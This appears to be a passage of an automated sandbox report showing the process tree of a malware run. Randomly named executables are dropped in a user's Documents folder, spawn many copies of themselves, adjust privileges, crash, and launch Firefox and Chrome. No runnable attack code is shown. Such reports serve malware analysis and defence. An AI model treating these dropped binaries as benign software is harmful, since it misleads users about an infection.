C:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exeC:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exe3⤵PID:16872
-
-
C:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exeC:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exe3⤵PID:11700
-
-
C:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exeC:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exe3⤵PID:11376
-
-
C:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exeC:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exe3⤵PID:2248
-
-
C:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exeC:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exe3⤵PID:15396
-
-
C:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exeC:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exe3⤵PID:11184
-
-
C:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exeC:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exe3⤵PID:17736
-
-
C:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exeC:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exe3⤵PID:18060
-
-
C:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exeC:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exe3⤵PID:18416
-
-
C:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exeC:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exe3⤵PID:15512
-
-
C:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exeC:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exe3⤵PID:17760
-
-
C:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exeC:\Users\Admin\Documents\7eoxxSSxUvFsSiF_hfeSfvb8.exe3⤵PID:17156
-
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe"C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe"2⤵
- Executes dropped EXE
PID:2184 -
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:5008
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:5292
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:1448
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:4632
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:5088
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:4536
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:4832
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:5708
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:6060
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:5636
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:5624
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:6092
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:6616
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:7012
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:2076
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:6624
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:6896
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:6864
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3664
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:6508
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:6592
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:6724
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:7544
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:7864
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:2448
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:7644
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:7228
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:5876
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:5232
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:7992
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:4852
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:8580
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:8916
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:580
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:6008
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:8664
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:4888
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:9436
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:9776
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:10112
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:6984
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:9704
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:10220
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:7888
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:8252
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:9468
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:5744
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:10484
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:10852
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:10340
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:10812
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:10424
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:10920
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:8812
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:10776
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:5776
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:11472
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:11788
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:9288
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:5684
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:11648
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11648 -s 244⤵
- Program crash
PID:8032
-
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:5684
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:12228
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:12548
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:12944
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:12308
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:3624
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:12300
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:10692
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:12864
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:8480
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:1356
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:13536
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:13820
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:14176
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:13344
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:10024
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:608
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:11928
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:5516
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:5980
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:13180
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:12748
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:8284
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:10804
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:7952
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:10868
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:13104
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:12860
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:14836
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:14528
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:15264
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:14560
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:14768
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:15332
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:14808
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:14832
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:15596
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:15432
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:15684
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:15520
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:8240
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:16460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 16460 -s 244⤵
- Program crash
PID:16880
-
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:16660
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:16980
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:17384
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:2372
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:6660
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:14680
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:17528
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:16648
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:4824
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:16692
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:18300
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:17960
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:4248
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:17764
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:18344
-
-
C:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exeC:\Users\Admin\Documents\0JXNrs2hv3cXBOmqj0EdPlmm.exe3⤵PID:13396
-
-
-
C:\Users\Admin\Documents\eK94rhp2j4votGuwVG47MZmB.exe"C:\Users\Admin\Documents\eK94rhp2j4votGuwVG47MZmB.exe"2⤵
- Executes dropped EXE
PID:2956
-
-
C:\Users\Admin\Documents\yPPvcHeJx5BXut4bjVmApamW.exe"C:\Users\Admin\Documents\yPPvcHeJx5BXut4bjVmApamW.exe"2⤵
- Executes dropped EXE
PID:2204 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:6012
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵PID:6044
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"3⤵PID:10936
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffba41c4f50,0x7ffba41c4f60,0x7ffba41c4f704⤵PID:9052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1632,2058154454567815226,16687973107209268111,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1648 /prefetch:24⤵PID:2364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1632,2058154454567815226,16687973107209268111,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2012 /prefetch:84⤵PID:11860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,2058154454567815226,16687973107209268111,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1700 /prefetch:84⤵PID:9948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,2058154454567815226,16687973107209268111,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2572 /prefetch:14⤵PID:8196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,2058154454567815226,16687973107209268111,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2588 /prefetch:14⤵PID:12668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,2058154454567815226,16687973107209268111,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:14⤵PID:12844
-
-
